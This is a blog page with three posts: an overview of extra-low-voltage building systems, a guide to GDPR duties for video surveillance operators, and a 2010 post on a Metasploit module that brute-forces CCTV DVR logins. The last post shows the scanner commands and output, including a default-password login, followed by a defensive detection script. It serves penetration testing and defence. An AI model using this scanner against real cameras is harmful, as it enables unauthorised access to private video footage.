Showing posts with label video surveillance system.

Monday, September 1, 2025

ELV Systems

What are Extra-Low Voltage Systems (ELV)? 

Extra-Low Voltage means the supply voltage is in a range low enough that it does not carry a high risk of electric shock.

The range of voltage that can be classified as Extra-Low Voltage is alternating current not exceeding 50 V AC and direct current not exceeding 120 V DC (ripple free). This is based on the standards as per EN 61558 or BS 7671.

The term extra-low voltage ("ELV") means an operating voltage not exceeding 50 Volt alternating current (a.c.) or 120 Volt ripple free direct current (d.c.) as defined in Australian / New Zealand Standard AS/NZS 3000.

Therefore, Extra-Low Voltage Systems are any electrical systems that can operate on a low voltage with the voltage criteria as per above.

Key Characteristics

· Low Voltage: The most defining feature is their safe, low-voltage operation, which reduces the risk of electric shock.

· Non-Core Systems: ELV systems are separate from the building's main, high-voltage electrical power system.

· Integrated Technologies: They are the "smart" components of a building, connecting devices and managing data.

In this article, we are going to share more about different components of ELV systems.

Components of ELV Systems

Video Surveillance System:

Video surveillance systems, more commonly known as Closed Circuit Television ("CCTV" for short), are made up of a network of cameras and recording systems that are connected to each other. Such a system is classified as a ‘closed’ system because it operates independently, unless it is part of an integrated ELV system. A CCTV system is an effective way to monitor and secure sensitive areas.

Currently, cameras can be connected to a CCTV system either by wire or wirelessly. CCTV is an effective deterrent against threats and is suited to areas that require constant offsite monitoring.

The key points when installing CCTV cameras are the positioning of the camera, so that it covers the required area within its field of view, and the clarity of the video footage, so that the footage is usable if needed.

Access Control System – ACS:

Access control systems are a key feature of any security system hub; they secure, monitor and manage the access of staff in any type of building. With this system, staff can be granted access to various areas of the premises using either access cards or fingerprints (biometrics).

Nowadays, these systems ‘speak’ to each other wirelessly and are usually connected to the local area network, which reduces hard-wiring cost and allows flexibility in positioning the system. At times, the access control system might be part of a bigger integrated ELV system, which allows central control of multiple different systems.

Public Address Voice Alarm System – PAVA:

A public address system is a system that allows an amplification of your voice through microphones and loudspeakers. Its purpose is to enhance the volume of human voice or any other sound for that matter.

The general alarm system allows remote control of alarms and flashing lights (beacons).

Combined, these systems serve the general purpose of relaying information and can be used in emergency evacuations.

Fire Detection & Alarm System - FDAS:

The Fire Alarm Control Panel is the brain of the system. It receives input from detectors and manual call points and sends output to sounders/bells.

ELV fire alarm systems can provide early warning of fires in public and state facilities, allowing for prompt evacuation and reducing the risk of injury or death. These systems can also be integrated into building management systems to provide automatic fire suppression, such as sprinklers or fire extinguishers.

LAN and IP-BX System:

LAN stands for local-area network: an interconnected computer network that usually covers a small area. The computers and devices on this network can be connected to each other via physical wires called LAN cables or wirelessly (radio waves).

A telephone system is a group of interconnected telephones connected either via telephone lines or via LAN cables which then communicate using ‘Voice over Internet Protocol’ or in short VoIP.

Intrusion Alarm System - IAS

An intrusion alarm system — also known as a burglar alarm system — is an important security measure that can protect your business from unwanted intruders, theft, vandalism, and property damage.

Intrusion alarm systems provide several key benefits for businesses, such as increased safety for building occupants, faster response times to breaches, and lower insurance premiums. By investing in an intrusion alarm system, you are taking a proactive approach toward the safety and security of your property.

Nurse call system - NCS

A nurse call system is a healthcare technology solution in hospitals and nursing homes that allows patients to request assistance from staff by pressing a call button or using a pendant. These systems feature call buttons, receiving units at the nurse's station, and often wireless devices like pagers or watches to notify nurses in real-time. The primary goal is to ensure timely patient care, improve safety by reducing response times, and enhance staff efficiency through features like real-time alerts and reporting.

Trunk Radio System – TRS

A trunk radio system is a system in which all available radio channels are placed in a single pool. When, for example, person A needs to transmit, a channel is automatically picked from the pool and used for person A’s transmission. Once the transmission is completed, the channel that person A was using is placed back into the pool for others to use.

This system is highly beneficial because radio channels are limited by nature: if all radio channels are taken up, new channels cannot be physically or manually ‘created’. A trunk radio system is more efficient in the sense that a user has a higher chance of getting access to an available channel when required.

Home Automation System - HAS:

Home automation is nothing but the mechanical management and administration of intelligent electronic appliances in a house. Sequencing pre-programmed smart devices to meet the unique needs of the residents is what a home automation system does.

In a home automation solution, devices can trigger each other without any human intervention. Furthermore, it allows users to schedule automated processes like switching the lights, controlling the temperature, calibrating the entertainment system, and more. What is home automation? It is an integrated system that makes life more convenient and helps in saving a variety of costs.

Fence Intrusion Detection System – FIDS

A fence intrusion detection system, or FIDS for short, is a security system whose key purpose is to detect any breaches that occur on perimeter fences.

There are multiple sensors installed on different parts of the fence so whenever an intrusion is detected in a certain fenced area, if there is a CCTV nearby, the security personnel would be able to angle the CCTV to view the intrusion if possible. If necessary, a physical check on the fence is needed as well to ensure the security and integrity of the perimeter.

Building Management System - BMS:

Building Management Systems (BMS) integrate and control various building functions. Multiple sensors are installed on different parts of the utility systems, and the BMS engineer controls all utility systems from a single room. A Building Management System is also known as IBMS and BAS in the Americas and the European countries.

IO points are further categorized into analogue and digital, with suitable field devices and sophisticated third-party devices fixed in a building. Their functions range from grounding an elevator, to monitoring the water level of a sump, to monitoring and controlling the properties of HVAC (Heating, Ventilation & Air Conditioning) equipment, that is, temperature, RH and pressure.

Water Leak Detection (WLD) system:

Early Water Detection is essential in a lot of businesses, for example, data centers, industrial sites, offices, hotels, residential buildings, and more. With the right detection of water and early alert, costly water damage can be avoided. HW group offers several products that provide ideal solutions for Water Leak Detection (WLD) that are developed to protect your facility against any water damage that might threaten you.

Water Leak Detection uses a sensing cable that detects water along the entire cable length and a WLD device (WLD2 / NB-WLD / ...) that can communicate an alarm in case of water occurrence (a few drops anywhere on the cable is enough).

Master Clock System – MCS:

A master clock system is an interconnected system of clocks whereby slave clocks would take reference of time from a reference clock, also known as a master clock. These slave clocks would synchronize their time with the master clock. In this way, the time across both the master and slave clocks would be the same.

Master clock systems are used in a variety of industries, such as the IT sector and the military, or anywhere that requires an extremely high degree of time accuracy.

Rodent Repellent System:

A rodent repellent is a device that emits ultrasonic sound waves to create an acoustically hostile environment that repels rodents. This helps to keep your Data Center free from rodents. The frequency of the sound induces rodents to move away from the Data Center premises. As per research by the University of Nebraska, the rodent repellent is a proven device: rodents under test would either leave the buildings or move to alternate areas not treated with ultrasound.

As the Data Center is an important business premises, it needs to be protected from many risks.

Exit Stopper Door Alarms:

The highly effective Exit Stopper can serve as an inexpensive security device and help stop theft by alerting you to any unauthorized exits or entries through emergency exit doors. It is a standalone fire exit stopper alarm with one relay for integration with the fire alarm system.

Professional Display & Signage

Professional display screens are high-quality, commercial-grade screens specifically designed for continuous use in business settings. Unlike consumer-grade TVs, they’re engineered to operate reliably for extended hours, often supporting 24/7 use without compromising on display quality or durability. Professional displays come with advanced features like remote content management, high brightness, and enhanced connectivity options, making them ideal for business environments.

ELV digital signage systems can provide real-time information, such as maps, directions, and event schedules, for tourists. This can improve convenience and enhance the overall experience by providing accurate and up-to-date information.

GRMS System:

A GRMS operates light management (on, off, or dimmer), automatic curtain openings (including blinds and rolling shutters), HVAC, TVs, and “do not disturb” or “make up room” alerts, based on the presence or absence of the guest in the room.

Mobile Phone and Wireless Distribution: 

Seamless connectivity, accessibility, and communication throughout a building.

Vehicle Tracking System

The GPS-based Vehicle Tracking System comprises an in-vehicle tracking system, which consists of a GPS receiver unit, a CDMA/GSM modem, an on-device data storage unit and other peripherals, and a web-based application. Through this system, users can monitor the movement of any vehicle and gather complete information about it.

IoT:

The IoT provides the connectivity that enables real-time monitoring and control of building systems, both on-site and remotely. With IoT-enabled BMS, building operators can monitor and control systems from anywhere, anytime, through a single user interface. This allows for greater efficiency, cost savings, and improved building performance.

In smart infrastructure, ELV systems, BMS, and IoT play a similar role in optimizing and monitoring the performance of critical infrastructure systems, such as energy grids, water supply networks, and transportation systems. These systems can be monitored and controlled in real-time to improve efficiency, reduce costs, and ensure reliability.

Role of IoT in improving ELV systems

The Internet of Things (IoT) can significantly improve ELV (Extra-Low Voltage) systems. IoT technology can connect and monitor ELV systems, providing real-time information, control, and automation capabilities.

Here are some ways in which IoT can improve ELV systems:

1.   Monitoring and Control: IoT devices, such as sensors and actuators, can control ELV systems, such as lighting, HVAC, and security systems. This can provide real-time information and allow for remote control of these systems, improving efficiency, comfort, and security.

2.   Predictive Maintenance: IoT technology can collect data from ELV systems and analyze it to predict when maintenance is needed. This can improve system reliability and reduce downtime, increasing efficiency and reducing costs.

3.   Energy Management: IoT technology can monitor and control energy consumption in ELV systems, reducing waste and improving energy efficiency. This can contribute to sustainability and reduce costs.

4.   Integration: IoT technology can integrate ELV systems with other building management systems, such as BMS (Building Management Systems), providing a more comprehensive and integrated solution.

5.   Real-time Analytics: IoT technology can collect and analyze real-time data from ELV systems, providing valuable insights into system performance and usage patterns. This can help to optimize system operation and improve decision-making.

Role of AI in ELV systems

Artificial Intelligence (AI) is playing an increasing role in ELV systems, including lighting control, building automation, audio and video systems, security systems, and more. AI can be used to improve the performance, efficiency, and intelligence of ELV systems in several ways:

1.   Predictive Maintenance: AI can analyze data from ELV systems to predict when maintenance or repairs will be required. This can reduce downtime and improve the overall reliability of the systems.

2.   Energy Efficiency: AI can optimize energy consumption in ELV systems, such as lighting control systems. For example, AI algorithms can analyze occupancy patterns and adjust lighting levels accordingly to reduce energy consumption.

3.   Real-Time Monitoring: AI can monitor ELV systems in real-time, providing early warning of potential issues and allowing for proactive maintenance and repairs.

4.   Automated Decision-Making: AI can automate decision-making processes in ELV systems, such as lighting or HVAC control. For example, AI algorithms can automatically analyze weather data and occupancy patterns to adjust heating and cooling levels.

5.   Improved User Experience: AI can improve the user experience of ELV systems, such as voice-controlled lighting control systems or personalized audio and video systems.

Role of cyber security for ELV systems

Cybersecurity is critical for ELV systems due to the sensitive nature of the systems and the potential consequences of a security breach. ELV systems are integrated into building management systems and often control essential functions, such as lighting, heating, ventilation, air conditioning, and security systems. Therefore, a breach of an ELV system can result in unauthorized access, loss of sensitive information, or disruption of critical building functions.

Here are some ways in which cyber security is essential for ELV systems:

1.   Protecting Sensitive Information: ELV systems often contain sensitive information, such as building plans, access codes, and security camera footage. Cybersecurity measures are necessary to protect this information from unauthorized access or theft.

2.   Preventing Unauthorized Access: ELV systems can be vulnerable to hacking or unauthorized access, allowing attackers to control or disrupt building functions. Cybersecurity measures, such as firewalls, access control systems, and encryption, are necessary to prevent unauthorized access.

3.   Maintaining Building Functionality: A breach of an ELV system can result in the disruption of critical building functions, such as heating, cooling, lighting, and security systems. Cybersecurity measures are necessary to maintain the functionality of these systems and protect against disruptions.

4.   Compliance with Regulations: Many countries have regulations and standards for cybersecurity in buildings, such as the European Union's General Data Protection Regulation (GDPR) and the United States Federal Information Processing Standard (FIPS). ELV systems must comply with these regulations to protect sensitive information and the security of building functions.

Conclusion

Now that you understand more about ELV systems and their various components, SSA INTEGRATE provides ELV system integration services for the telecommunications, security, surveillance and oil & gas industries.

We have a team of highly experienced engineers and technicians who would be able to assist you in any challenging system integration issues.

We can design, supply and commission full ELV integrated systems, complete with detailed testing that follows the actual site conditions, to ensure full functionality before handing over the project. We also provide Information Security Management System audits as per ISO/IEC 27001:2022.

Due to our experience in installing explosion proof systems, we are well versed in working and installing ELV systems in hazardous environments.


Saturday, November 3, 2018

Video Security Dual Responsibility GDPR

Video Security Organizations’ Dual Responsibility Under GDPR

GDPR - the EU General Data Protection Regulation - is now in effect (as of May 25th, 2018). The regulations are designed to protect the data privacy of European Union (EU) residents, but because the rules affect any company handling EU data, the true influence of the GDPR is international in scope.

GDPR affects security technologies like video surveillance systems. Here’s what you need to know to improve your GDPR compliance.

GDPR is a regulation set forth to protect personal data and ensure the privacy of individuals within the European Union (EU), which is deemed to be a fundamental human right. The primary driver behind the regulation is to give individuals greater control over their personal data and how it is used. Despite its roots in the EU, GDPR also addresses the collection or storage of personal data from any EU citizen, as well as the export of data outside the region. Therefore, given the scope of GDPR, compliance is a global concern.

Because cybersecurity was a main driver behind GDPR, one of its mandates is that, in the event of a data breach, companies that collect personal data must report it to the supervisory authority within 72 hours. Failure to comply with this regulation could result in penalties equaling 4 percent of a company’s global annual revenues or 20 million euros, whichever is greater.

Given the importance of individuals’ privacy and the potential penalties for non-compliance, these are important discussions; however, this focus is not enough for those of us in the security industry, who have a dual responsibility under GDPR. Why is that?

In practical terms of protecting individual privacy, GDPR places much of the responsibility and obligation on businesses and other organizations that deal with personal data. One of the key features of the new regulation is that those who are being monitored need to be fully informed about what data is being held on them and how it is being used.

Under GDPR, this “personal data” is defined very broadly as “any information relating to an identified or identifiable natural person,” referred to as the “data subject.” Naturally, the first types of personal data that come to mind are the classic examples such as name, physical address, phone number and email address, all of which meet the criteria. But these are only starting points, as the range of personal data types is expansive, encompassing more than simply text-based data.

As security professionals, we must recognize the reality that video in which a person can be identified is also considered personal data and is therefore subject to GDPR guidelines and requirements. Therefore, as organizations, we need to determine how best to become compliant with how we handle customer and employee data, including surveillance video. This dual responsibility must come into play when we consider how we design and operate security systems and collect video data through surveillance, including how we store and manage that video data after collection.

To do so, it is important to explore how many of the steps organizations must take to become GDPR compliant are also necessary to ensure that video surveillance data is compliant as well. These steps surveillance operators must take – and how they can be applied to collected video – are outlined below.

Administration
In general, the first step in ensuring GDPR compliance is to choose an administrator and record data processing activities. As an organization seeking to become GDPR compliant, it is essential to have a person on staff – known as a data processing officer – who will ultimately be responsible for data integrity. Each company providing video surveillance must choose an administrator.

In a security environment, choosing this administrator allows for an open way to publicly identify the person who is responsible for data collected from the surveillance systems and provide that detail to anyone who is monitored by video upon their request. In doing so, it is key to also make the name of this data processing officer available to every person who requests data as prescribed under GDPR.

Every organization should also have a procedure in place for when an individual chooses to exercise their right of access to personal data or request its deletion, which allows them to stay within the monthlong window within which GDPR requires them to comply with these requests. When making such a request, it is reasonable to expect an individual to provide adequate information in order to locate this data – for example, an approximate timeframe, and the location where the footage was captured.

Documentation

GDPR also recommends that record of processing activities (ROPA) documentation be maintained and the following information be made available upon request:
  • Category of individuals that processed personal data relates to
  • Purpose for which collected data is used
  • Whether personal data will be transferred (to whom and for what reason)
  • How long personal data will be stored
  • Description of technical and organizational measures to ensure privacy

According to GDPR, administrators should take all appropriate measures to provide this information concerning the processing of their data by surveillance systems to monitored individuals in a brief, transparent, comprehensible and easily accessible manner.


ROPA documentation must also include a risk assessment for individuals’ rights and freedoms and planned measures to address these risks, which include safeguards and mechanisms to ensure the protection of personal data and compliance with GDPR. This should take into account the rights and legitimate interests of individuals and other affected persons.

In a surveillance environment, these items are equally important. Focusing for a moment on purpose and extent of surveillance, it must be clear why and how much video is being collected, and for what reason. One thing to discuss with potential solution providers is the concept of privacy by design and “GDPR-ready” product features. In evaluating solutions, organizations should look for those that will help them more easily become GDPR compliant. An example would be technology supporting defined view of a specific perimeter. By leveraging solutions to define the perimeter, organizations adhere to GDPR in that they can more easily specify the extent of video surveillance.

Data Processing Inventory Assessment (DPIA)
Once an administrator has been chosen and ROPA documentation is complete, a DPIA is required for cases of “extensive systematic monitoring of publicly accessible premises.”


This requires specifying in writing why and for what purposes the camera system is recording. For example, a city needs to manage electrical and water utility stations and must ensure the utilities provide residents with dependable service. Therefore, the perimeter of these utility stations must be protected against crime and theft. Under GDPR, the city can specify that the surveillance is provided for this purpose. Another example would be to ensure the safety of citizens during public events, as surveillance video may be used by the police to provide real-time situational awareness for officers in the field. In this case, it can be specified, in accordance with GDPR guidelines, that video is being collected to support public safety.


This information directly correlates to ROPA documentation, so again we can see the connection between becoming compliant as an organization overall, as well as ensuring compliance for GDPR with information and data collected in a surveillance environment.

Data Security
Cybersecurity has been a major topic within the security industry for some years now. The importance of a surveillance system being cyber secure extends to compliance with GDPR, with tight control of video data being another key recommendation. It is vitally important when specifying a system that these critical measures are taken into account. The less data that is readily accessible to those outside the scope of an organization’s video data management procedures, the less risk there is of becoming non-compliant. The same philosophy applies to data breaches; administrators must report any leaks within 72 hours of notification.


To ensure GDPR compliance, companies should employ strong measures to prevent unauthorized access to the personal data they store, including video. The specific tools and tactics used by each company will be unique to the challenges they face. In all situations, however, companies must employ robust security controls, stay up to date with cybersecurity best practices and ensure they are working with trusted partners that provide secure hardware and software, as well as thorough aftercare. Therefore, organizations must work with security professionals and partners to better understand potential cybersecurity risks and talk about ways they can harden their systems to ensure GDPR compliance.

From a compliance perspective, the processes that must be put in place to ensure the “right to be forgotten” in an organization are very similar to those necessary to ensure a surveillance system is also in compliance. This requires taking a systematic approach to how video data is stored, transferred and deleted. These methodologies will ensure that if an individual requests his or her video footage be deleted, business systems and organizational structure will be in place to adhere to this request in an efficient manner. The concept of “right to be forgotten” is a significant part of the GDPR guidelines, and as we are just months into this new guideline, the impact on organizations and system operators after requests are submitted still remains to be seen.

Data audit
The first step toward cybersecurity risk management is knowing what data your company is collecting and how it is stored. A comprehensive data audit is fundamental because you’ll need to discover what information your company handles that could create liability under the GDPR. The GDPR is very inclusive in its scope, so a data audit should look at all platforms, device types and departments.

Risk assessment

Once you've done a data audit to establish a clear picture of how your company’s data management works, you’ll be in a position to make a risk assessment:
  • What cyber-threats could your company face?
  • Where are the security weak-points in your technology infrastructure?
  • Do you have effective cybersecurity measures in place?

End-to-End Compliance
It is important to consider the full scope of video surveillance. As a surveillance operator collecting video about living individuals, an organization will fall under the category of data controller and be held responsible for data management in accordance with GDPR. Anyone having access to video data, including subcontractors and hosted service providers, must meet requirements as well. These companies or individuals who have access to recorded video on behalf of an organization, such as hosting providers, fall under the category of data processors. In terms of company compliance, review contracts to ensure all companies comply in the same way as the organization has planned. In terms of surveillance, be sure to check that any persons or organizations who have access to video are also compliant and that contractual relationships reflect these obligations.

Ultimately, it is the surveillance system user (i.e., data controller) who is responsible for GDPR compliance and safeguarding the rights of individuals whose personal data the user collects and processes. While the data controller has ultimate responsibility to follow GDPR, data privacy is a team effort. Remember: We are all in this together.

Therefore, for users of surveillance equipment, solutions and services, it is important to partner with suppliers that are committed to respecting and safeguarding individuals’ privacy and protecting personal data. Users should also be able to rely on suppliers and vendors for the support and technical assistance necessary to facilitate GDPR compliance.

Due to its intent, the onset of GDPR is a positive one. It will allow data processors and controllers to use data in appropriate ways and have clear guidelines/procedures in place for data collection, management and surveillance. Many companies follow guidelines such as the UN Global Compact when it comes to sustainability and environmental responsibility. The UN Global Compact provides 10 clear principles to help guide companies in their sustainability efforts. GDPR provides similar clear direction to companies looking to protect individual privacy, a fundamental human right.

Information on individuals is a valuable asset and needs to be properly protected. Apart from making good business sense, the reputation and success of your organization can be under threat if personal information isn’t managed appropriately. Organizations can demonstrate effective management of personal information with BS 10012 from BSI.

It helps you:
  • Identify risks to personal information and put controls in place to manage or reduce them
  • Demonstrate compliance with data protection legislation and gain preferred supplier status
  • Gain stakeholder and customer trust that their personal data is protected 
  • Gain a tender advantage and win new business
  • Safeguard your organization's reputation and avoid adverse publicity
  • Protect you and your organization against civil and criminal liability
  • Benchmark your own personal information management practices with recognized best practice.

Basic Principles of the GDPR

Clearly Justified Purpose

All organizations must have a valid lawful basis for collecting and processing personal data.

Privacy by Design

The GDPR mandates that privacy must be a priority throughout system design and commissioning. The approach taken with respect to data privacy must be proactive, not reactive. Risks should be anticipated and the objective must be preventing events before they occur.
  
Right to Access

Under Article 15, the GDPR gives individuals control over their personal data including the right to see that data.

Right to be Forgotten

Under Article 17, the GDPR gives individuals control over their personal data including the right to have their personal data erased if it is no longer necessary for the intended purpose of the system.

Security

The GDPR requires organizations to have comprehensive policies and procedures ensuring personal data remains within the control of the organization at all times. Additionally, personal data breaches must be reported within 72 hours to the competent supervisory authority appointed by their country’s government.

Reference:
  1. https://www.mailguard.com.au/blog/gdpr-security-responsibility
  2. https://www.bsigroup.com/en-IN/
  3. https://edps.europa.eu/sites/edp/files/publication/10-03-17_video-surveillance_guidelines_en.pdf
  4. https://gdpr-info.eu/art-13-gdpr/



Friday, September 17, 2010

Hacking CCTV Security Video Surveillance Systems with Metasploit

A new module for the Metasploit Framework, CCTV DVR Login Scanning Utility*, discovers and tests the security of standalone CCTV (Closed Circuit Television) video surveillance systems. Such systems are frequently deployed in retail stores, living communities, personal residences, and business environments as part of their physical security program. However, many of these systems are vulnerable to exploitation that can allow attackers remote access. Such remote access, enabled by default, can allow an attacker not only to view real-time video but also to control the cameras (if supported) and to access archived footage.

Most owners of CCTV video surveillance systems may not even be fully aware of the device's remote access capabilities as monitoring may be conducted exclusively via the local video console. This further increases the likelihood of attackers gaining/persisting remote access, with no indication to the owner that their video surveillance system and archived footage may be accessed remotely.

Here at Gotham Digital Science, we often encounter video surveillance systems during penetration testing engagements – some of which may be exposed to the Internet, either intentionally or by accident. With any video surveillance system it is often interesting (and sometimes very important) to find out exactly what cameras are monitoring/recording within the environment. Furthermore, access to such systems can often be utilized to support physical security testing initiatives.

This module targets standalone CCTV video surveillance systems by MicroDigital, HIKVISION, CTRing, and a substantial number of other rebranded devices.

msf > use auxiliary/scanner/misc/cctv_dvr_login
msf auxiliary(cctv_dvr_login) > set RHOSTS 10.10.1.14
RHOSTS => 10.10.1.14
msf auxiliary(cctv_dvr_login) > exploit

[*] 10.10.1.14:5920 CCTV_DVR - [001/133] - Trying username:'admin' with password:''
[-] 10.10.1.14:5920 CCTV_DVR - [001/133] - Failed login as: 'admin'
[*] 10.10.1.14:5920 CCTV_DVR - [002/133] - Trying username:'user' with password:''
[-] 10.10.1.14:5920 CCTV_DVR - [002/133] - Invalid user: 'user'
[*] 10.10.1.14:5920 CCTV_DVR - [003/133] - Trying username:'admin' with password:'admin'
[-] 10.10.1.14:5920 CCTV_DVR - [003/133] - Failed login as: 'admin'
[*] 10.10.1.14:5920 CCTV_DVR - [004/133] - Trying username:'admin' with password:'1111'
[+] 10.10.1.14:5920 Successful login: 'admin' : '1111'
[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1): http://10.10.1.14:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
*CCTV DVR Login Scanning Utility:
This module tests for standalone CCTV DVR video surveillance deployments specifically by MicroDigital, HIKVISION, CTRing, and numerous other rebranded devices that are utilizing default vendor passwords. Additionally, this module has the ability to brute force user accounts. Such CCTV DVR video surveillance deployments support remote viewing through Central Management Software (CMS) via the CMS Web Client, an IE ActiveX control hosted over HTTP, or through Win32 or mobile CMS client software. By default, remote authentication is handled over port 5920/TCP with video streaming over 5921/TCP. After successful authentication over 5920/TCP this module will then attempt to determine if the IE ActiveX control is listening on the default HTTP port (80/TCP).
Module Name : auxiliary/scanner/misc/cctv_dvr_login
Authors: Mr. Justin Cacak
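
A defender-side counterpart to the scan above, as an added example that is not part of the original post or the Metasploit module: it flags bursts of connections to the DVR authentication port (5920/TCP) and any connection to 5920/5921 from outside your own address space. The log format, internal network range, window and threshold are assumptions, as is each login attempt appearing as its own connection record; the sample lines are constructed.

```python
import ipaddress
from collections import defaultdict, deque
from datetime import datetime, timedelta

DVR_AUTH_PORT, DVR_STREAM_PORT = 5920, 5921   # defaults named in the module description
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]  # assumption: your own address space
WINDOW = timedelta(seconds=60)   # assumption: burst window
THRESHOLD = 10                   # assumption: auth connections per source per window

def build_sample():
    """Constructed log lines: 'timestamp src dst dst_port action'."""
    t0 = datetime(2010, 9, 17, 9, 0, 0)
    stamp = lambda s: (t0 + timedelta(seconds=s)).isoformat()
    lines = [f"{stamp(2 * i)} 10.10.1.50 10.10.1.14 5920 ACCEPT" for i in range(12)]
    lines += [f"{stamp(1)} 10.10.1.20 10.10.1.14 5920 ACCEPT",   # one normal CMS login
              f"{stamp(5)} 203.0.113.7 10.10.1.14 5921 ACCEPT",  # stream reached from outside
              f"{stamp(6)} 10.10.1.20 10.10.1.9 443 ACCEPT",     # unrelated traffic
              "truncated line"]
    return lines

def analyze(lines, window=WINDOW, threshold=THRESHOLD):
    events = []
    for line in lines:
        parts = line.split()
        try:
            ts, src = datetime.fromisoformat(parts[0]), ipaddress.ip_address(parts[1])
            dst, port = parts[2], int(parts[3])
        except (IndexError, ValueError):
            continue                      # skip malformed records
        if port in (DVR_AUTH_PORT, DVR_STREAM_PORT):
            events.append((ts, src, dst, port))
    events.sort(key=lambda e: e[0])       # logs may arrive out of order
    findings, recent = set(), defaultdict(deque)
    for ts, src, dst, port in events:
        if not any(src in net for net in INTERNAL_NETS):
            findings.add(("external-access", str(src), dst, port))
        if port == DVR_AUTH_PORT:
            q = recent[(src, dst)]
            q.append(ts)
            while ts - q[0] > window:     # drop connections older than the window
                q.popleft()
            if len(q) >= threshold:
                findings.add(("auth-burst", str(src), dst, port))
    return sorted(findings)

if __name__ == "__main__":
    for finding in analyze(build_sample()):
        print(finding)
```

Explicit internal ranges are used instead of `is_private` because Python treats documentation ranges such as 203.0.113.0/24 as private, which would hide the external-access finding in the sample.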